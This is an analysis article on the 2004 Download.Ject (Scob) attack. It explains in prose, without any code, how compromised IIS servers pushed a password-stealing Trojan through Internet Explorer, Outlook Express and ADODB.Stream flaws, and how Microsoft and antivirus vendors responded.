On June 24, 2004, Microsoft published information about an exploit called Download.Ject (also known as Scob, Toofer, and Webber.P) that attempts to install a "Trojan horse" program on users' PCs. This Trojan can later be used to steal users' passwords for e-commerce, Web-based e-mail, and online banking sites.

Download.Ject does not attempt to replicate itself, and is therefore not a virus or worm, making it different from other highly publicized exploits such as SQL Slammer (which infected SQL Server in Feb. 2003) or Code Red (which infected IIS in July 2001). However, while these past exploits were annoying—Slammer, for instance, created massive amounts of IP traffic as it replicated itself, slowing the Internet and corporate networks to a crawl—most did not attempt to destroy, steal, or significantly alter users' data.

A quick response from antivirus companies and authorities seems to have limited the damage from Download.Ject. Nonetheless, because it was so sophisticated, exploiting three separate Microsoft technologies, and because of its seeming criminal intent, enterprises and end users should be aware of what happened and how to reduce the likelihood of damage from similar attacks in the future.

Three Attack Vectors

According to Microsoft and security researchers that publicized the exploit, Download.Ject used three attack vectors—two known vulnerabilities for which Microsoft had issued patches and by-design functionality in an ActiveX control.

First, the attackers exploited a vulnerability in IIS 5.0, the Web server that shipped with Windows 2000 Server, to insert JavaScript onto Web pages. Although Microsoft had issued a patch for this IIS vulnerability in Apr. 2004 (covered in Microsoft Security Bulletin MS04-011), some Web sites had not yet installed the patch—a problem also seen in past exploits. Only Kelley Blue Book, a car-pricing site, publicly acknowledged the infection, although security researchers suggested that some other sites were affected. But because Microsoft and security researchers did not publicize possible infections, mainly out of concern for Web sites' privacy and business, users had no way of knowing whether sites they normally considered trustworthy had in fact been compromised.

When a user visited an infected Web page, the JavaScript instructed the user's PC to download and install a program from a server located in Russia. According to security researchers LURHQ, this program (a variant of a previously seen Trojan known as Berbew, Webber, or Padador) collects users' passwords when they log into auction site Ebay, payment site Paypal (used by Ebay), and Web-based e-mail accounts from Earthlink, Juno, and Yahoo, and periodically transmits these passwords to the attackers. In addition, when users visit certain (unrevealed) credit card or online banking sites, the Trojan creates false pop-up windows that ask for users' PIN numbers or credit card numbers—the windows appear to be legitimate, but are actually redirecting users to a site administered by the attacker.

As IE was designed, scripts (including JScript and VBScript) are supposed to run only within the browser window and should not be able to take control of a user's PC in this fashion—that is, to download and execute a program without the user's consent. But Download.Ject took advantage of a vulnerability in Outlook Express (which, like IE, ships with every copy of Windows) and by-design functionality in an ActiveX control known as ADODB.Stream to give this JScript code access to other PC functions.

At the time of the attack, Microsoft had released a patch for the Outlook Express vulnerability (MS 04-013). However, even though security researchers warned as early as July 2003 that ADODB.Stream could be misused, Microsoft did not immediately address the problem for fear that it would break existing Web applications.

Response Quick, But Problems Remain

Shortly after Download.Ject was widely publicized on June 24, several antivirus vendors updated their virus-detection programs and posted instructions for Webmasters and end users to detect and repair compromised machines, and Microsoft posted a security bulletin about the exploit. By the next day, the Russian Web server that was the source of the Trojan had been disabled.

On July 2, Microsoft released a configuration update for Windows 2000 (Server and Professional), Windows XP, and Windows Server 2003 via Windows Update that disabled ADODB.Stream's ability to write to the OS, thereby fixing the remaining vulnerability. (Microsoft does not call this a patch because it disables by-design functionality rather than fixing an acknowledged bug or flaw.)

Although installing all the applicable patches and configuration changes would have prevented Download.Ject from causing harm, they do not address the core problem: by enabling IE to support interactive applications through technologies such as scripting, ActiveX, and Dynamic HTML (DHTML), and integrating IE with Windows, Microsoft has increased the exposure of Windows to malicious executable code delivered over the Internet from unknown sources. Indeed, several days after Microsoft released the ADODB.Stream configuration change, security researchers showed how a similar exploit could take advantage of another ActiveX control, Shell.Application.

Back to associated article: No Standalone Updates on IE Roadmap